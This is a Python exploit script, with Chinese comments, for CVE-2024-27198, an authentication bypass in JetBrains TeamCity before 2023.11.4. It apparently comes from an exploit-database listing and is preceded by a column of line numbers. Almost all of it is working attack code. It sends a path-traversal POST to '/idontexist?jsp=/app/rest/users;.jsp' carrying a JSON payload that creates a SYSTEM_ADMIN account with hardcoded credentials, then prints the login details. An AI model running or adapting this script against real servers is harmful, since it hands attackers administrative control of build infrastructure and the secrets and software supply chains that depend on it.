1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
# 漏洞标题:JetBrains TeamCity 2023.11.4 - 身份验证绕过
# 日期:2024-02-21
# 漏洞作者:ibrahimsql (https://github.com/ibrahimsql)
# 厂商主页:https://www.jetbrains.com/teamcity/
# 版本:< 2023.11.4
# CVE:CVE-2024-27198
# CVSS 评分:9.8(严重)
# 描述:
# JetBrains TeamCity 2023.11.4之前版本存在严重的身份验证绕过漏洞,
# 允许未经身份验证的攻击者执行管理操作。该漏洞利用JSP处理机制中的路径遍历技术,
# 结合REST API端点来绕过身份验证。
# 要求:requests>=2.25.1
"""
import requests
import argparse
import sys
import json
from urllib.parse import urlparse
requests.packages.urllib3.disable_warnings()
class Colors:
RED = '\033[91m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
BLUE = '\033[94m'
CYAN = '\033[96m'
BOLD = '\033[1m'
END = '\033[0m'
banner = f"""{Colors.CYAN}
████████╗███████╗ █████╗ ███╗ ███╗ ██████╗██╗████████╗██╗ ██╗
╚══██╔══╝██╔════╝██╔══██╗████╗ ████║██╔════╝██║╚══██╔══╝╚██╗ ██╔╝
██║ █████╗ ███████║██╔████╔██║██║ ██║ ██║ ╚████╔╝
██║ ██╔══╝ ██╔══██║██║╚██╔╝██║██║ ██║ ██║ ╚██╔╝
██║ ███████╗██║ ██║██║ ╚═╝ ██║╚██████╗██║ ██║ ██║
╚═╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝ ╚═╝
{Colors.END}
{Colors.BOLD}{Colors.RED} TeamCity 身份验证绕过 (CVE-2024-27198){Colors.END}
{Colors.YELLOW} 作者:ibrahimsql{Colors.END}
"""
parser = argparse.ArgumentParser(description="TeamCity 身份验证绕过漏洞利用 (CVE-2024-27198)")
parser.add_argument("--url", type=str, required=True, help="目标 TeamCity URL")
parser.add_argument("--timeout", type=int, default=15, help="请求超时时间(默认:15)")
parser.add_argument("--verbose", "-v", action="store_true", help="启用详细输出")
args = parser.parse_args()
class TeamCityExploit:
def __init__(self, target_url, timeout=15, verbose=False):
self.target_url = target_url.rstrip('/')
self.timeout = timeout
self.verbose = verbose
self.session = requests.Session()
def _log(self, message, level="info"):
if level == "success":
print(f"{Colors.GREEN}[+] {message}{Colors.END}")
elif level == "error":
print(f"{Colors.RED}[-] {message}{Colors.END}")
elif level == "warning":
print(f"{Colors.YELLOW}[!] {message}{Colors.END}")
elif level == "info":
print(f"{Colors.BLUE}[*] {message}{Colors.END}")
elif level == "verbose" and self.verbose:
print(f"[DEBUG] {message}")
def check_target_reachability(self):
try:
self._log(f"检查目标:{self.target_url}")
response = self.session.get(self.target_url, verify=False, timeout=self.timeout)
if response.status_code in [200, 302, 401, 403]:
self._log("目标可达", "success")
return True
else:
self._log(f"意外状态:{response.status_code}", "error")
return False
except requests.exceptions.Timeout:
self._log("连接超时", "error")
return False
except requests.exceptions.ConnectionError:
self._log("连接错误", "error")
return False
except Exception as e:
self._log(f"错误:{str(e)}", "error")
return False
def exploit_authentication_bypass(self):
exploit_path = "/idontexist?jsp=/app/rest/users;.jsp"
full_url = f"{self.target_url}{exploit_path}"
self._log(f"目标URL:{full_url}")
headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"Accept": "application/json, text/plain, */*"
}
payload = {
"username": "ibrahimsql",
"password": "ibrahimsql",
"email": "ibrahimsql@exploit.local",
"roles": {
"role": [{
"roleId": "SYSTEM_ADMIN",
"scope": "g"
}]
}
}
self._log(f"载荷:{json.dumps(payload)}", "verbose")
try:
self._log("尝试身份验证绕过...")
response = self.session.post(full_url, headers=headers, verify=False, json=payload, timeout=self.timeout)
self._log(f"状态:{response.status_code}", "verbose")
self._log(f"响应:{response.text[:200]}", "verbose")
if response.status_code == 200:
self._log("漏洞利用成功!", "success")
print(f"\n{Colors.BOLD}{Colors.GREEN}[成功] 管理员用户已创建!{Colors.END}")
print(f"{Colors.CYAN}{'='*50}{Colors.END}")
print(f"{Colors.YELLOW}用户名:{Colors.END} ibrahimsql")
print(f"{Colors.YELLOW}密码:{Colors.END} ibrahimsql")
print(f"{Colors.YELLOW}登录URL:{Colors.END} {self.target_url}/login.html")
print(f"{Colors.CYAN}{'='*50}{Colors.END}")
return True
elif response.status_code == 401:
self._log("需要身份验证 - 目标可能已修复", "error")
return False
elif response.status_code == 404:
self._log("端点未找到 - 目标可能已修复", "error")
return False
elif response.status_code == 403:
self._log("访问被禁止", "error")
return False
else:
self._log(f"意外状态:{response.status_code}", "error")
return False
except requests.exceptions.Timeout:
self._log("请求超时", "error")
return False
except requests.exceptions.ConnectionError:
self._log("连接错误", "error")
return False
except Exception as e:
self._log(f"错误:{str(e)}", "error")
return False
def validate_url(url):
try:
parsed = urlparse(url)
if not parsed.scheme:
url = f"http://{url}"
parsed = urlparse(url)
if parsed.scheme not in ['http', 'https']:
raise ValueError("URL必须使用HTTP或HTTPS")
if not parsed.netloc:
raise ValueError("无效的URL格式")
return url
except Exception as e:
raise ValueError(f"无效的URL:{str(e)}")
def main():
print(banner)
try:
target_url = validate_url(args.url)
print(f"{Colors.BOLD}{Colors.CYAN}=== CVE-2024-27198 TeamCity 漏洞利用 ==={Colors.END}")
print(f"{Colors.YELLOW}作者:{Colors.END} ibrahimsql")
print(f"{Colors.YELLOW}目标:{Colors.END} {target_url}")
print(f"{Colors.CYAN}{'='*45}{Colors.END}\n")
exploit = TeamCityExploit(target_url=target_url, timeout=args.timeout, verbose=args.verbose)
if not exploit.check_target_reachability():
exploit._log("无法访问目标", "error")
sys.exit(1)
success = exploit.exploit_authentication_bypass()
if success:
exploit._log("漏洞利用完成!", "success")
sys.exit(0)
else:
exploit._log("漏洞利用失败", "error")
sys.exit(1)
except ValueError as e:
print(f"{Colors.RED}[-] {str(e)}{Colors.END}")
sys.exit(1)
except KeyboardInterrupt:
print(f"\n{Colors.YELLOW}[!] 已中断{Colors.END}")
sys.exit(1)
except Exception as e:
print(f"{Colors.RED}[-] 错误:{str(e)}{Colors.END}")
sys.exit(1)
if __name__ == "__main__":
main()
|